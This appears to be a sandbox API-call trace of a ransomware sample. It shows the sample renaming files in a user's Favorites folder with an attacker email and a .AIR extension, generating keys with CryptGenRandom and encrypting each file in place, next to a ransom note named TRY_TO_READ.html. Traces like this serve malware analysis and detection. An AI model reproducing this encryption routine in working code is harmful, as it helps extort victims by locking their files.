	[0106.452] FindNextFileW (in: hFindFile=0x5daf70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1
	[0106.452] FindNextFileW (in: hFindFile=0x5daf70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6520070, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6520070, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6520070, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0106.452] FindNextFileW (in: hFindFile=0x5daf70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6520070, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6520070, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6520070, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0106.452] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.452] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.452] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url", dwFileAttributes=0x80) returned 1
	[0106.453] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 68
	[0106.453] GetProcessHeap () returned 0x540000
	[0106.453] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xee) returned 0x597dc8
	[0106.453] lstrcpyW (in: lpString1=0x597dc8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url"
	[0106.453] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.453] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.455] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x534
	[0106.455] GetProcessHeap () returned 0x540000
	[0106.455] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597dc8 | out: hHeap=0x540000) returned 1
	[0106.455] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=133) returned 1
	[0106.455] SetFilePointer (in: hFile=0x534, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x85
	[0106.455] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.455] GetProcessHeap () returned 0x540000
	[0106.455] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.455] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.456] WriteFile (in: hFile=0x534, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.457] WriteFile (in: hFile=0x534, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.457] WriteFile (in: hFile=0x534, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.457] ReadFile (in: hFile=0x534, lpBuffer=0x57fbc0, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fbc0*, lpNumberOfBytesRead=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.457] SetFilePointer (in: hFile=0x534, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.457] WriteFile (in: hFile=0x534, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.457] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.457] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.457] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url", dwFileAttributes=0x80) returned 1
	[0106.458] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 61
	[0106.458] GetProcessHeap () returned 0x540000
	[0106.458] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe0) returned 0x601bd0
	[0106.458] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url"
	[0106.458] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.458] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.461] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x534
	[0106.461] GetProcessHeap () returned 0x540000
	[0106.461] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0106.461] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=133) returned 1
	[0106.461] SetFilePointer (in: hFile=0x534, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x85
	[0106.461] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.461] GetProcessHeap () returned 0x540000
	[0106.461] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.461] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.462] WriteFile (in: hFile=0x534, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.463] WriteFile (in: hFile=0x534, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.463] WriteFile (in: hFile=0x534, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.463] ReadFile (in: hFile=0x534, lpBuffer=0x598b60, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x598b60*, lpNumberOfBytesRead=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.463] SetFilePointer (in: hFile=0x534, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.463] WriteFile (in: hFile=0x534, lpBuffer=0x57fb28*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesWritten=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.463] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.463] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.463] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url", dwFileAttributes=0x80) returned 1
	[0106.464] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 68
	[0106.464] GetProcessHeap () returned 0x540000
	[0106.464] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xee) returned 0x57fb28
	[0106.464] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url"
	[0106.464] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.464] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.466] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x534
	[0106.466] GetProcessHeap () returned 0x540000
	[0106.466] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0106.466] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=133) returned 1
	[0106.466] SetFilePointer (in: hFile=0x534, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x85
	[0106.466] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.466] GetProcessHeap () returned 0x540000
	[0106.467] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.467] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.467] WriteFile (in: hFile=0x534, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.468] WriteFile (in: hFile=0x534, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.468] WriteFile (in: hFile=0x534, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.468] ReadFile (in: hFile=0x534, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.468] SetFilePointer (in: hFile=0x534, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.468] WriteFile (in: hFile=0x534, lpBuffer=0x57fbb8*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fbb8*, lpNumberOfBytesWritten=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.469] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.469] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.469] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url", dwFileAttributes=0x80) returned 1
	[0106.471] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 67
	[0106.471] GetProcessHeap () returned 0x540000
	[0106.471] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xec) returned 0x598b60
	[0106.471] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url"
	[0106.471] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.471] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.474] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x534
	[0106.474] GetProcessHeap () returned 0x540000
	[0106.474] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.474] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=133) returned 1
	[0106.474] SetFilePointer (in: hFile=0x534, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x85
	[0106.474] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.475] GetProcessHeap () returned 0x540000
	[0106.475] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.475] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.475] WriteFile (in: hFile=0x534, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.476] WriteFile (in: hFile=0x534, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.476] WriteFile (in: hFile=0x534, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.476] ReadFile (in: hFile=0x534, lpBuffer=0x598b60, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x598b60*, lpNumberOfBytesRead=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.476] SetFilePointer (in: hFile=0x534, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.476] WriteFile (in: hFile=0x534, lpBuffer=0x57fb28*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesWritten=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.477] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.477] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.477] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url", dwFileAttributes=0x80) returned 1
	[0106.477] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 75
	[0106.478] GetProcessHeap () returned 0x540000
	[0106.478] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8670
	[0106.478] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url"
	[0106.478] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.478] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.495] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x534
	[0106.495] GetProcessHeap () returned 0x540000
	[0106.495] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0106.495] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=133) returned 1
	[0106.495] SetFilePointer (in: hFile=0x534, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x85
	[0106.495] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.495] GetProcessHeap () returned 0x540000
	[0106.495] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.495] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.495] WriteFile (in: hFile=0x534, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.497] WriteFile (in: hFile=0x534, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
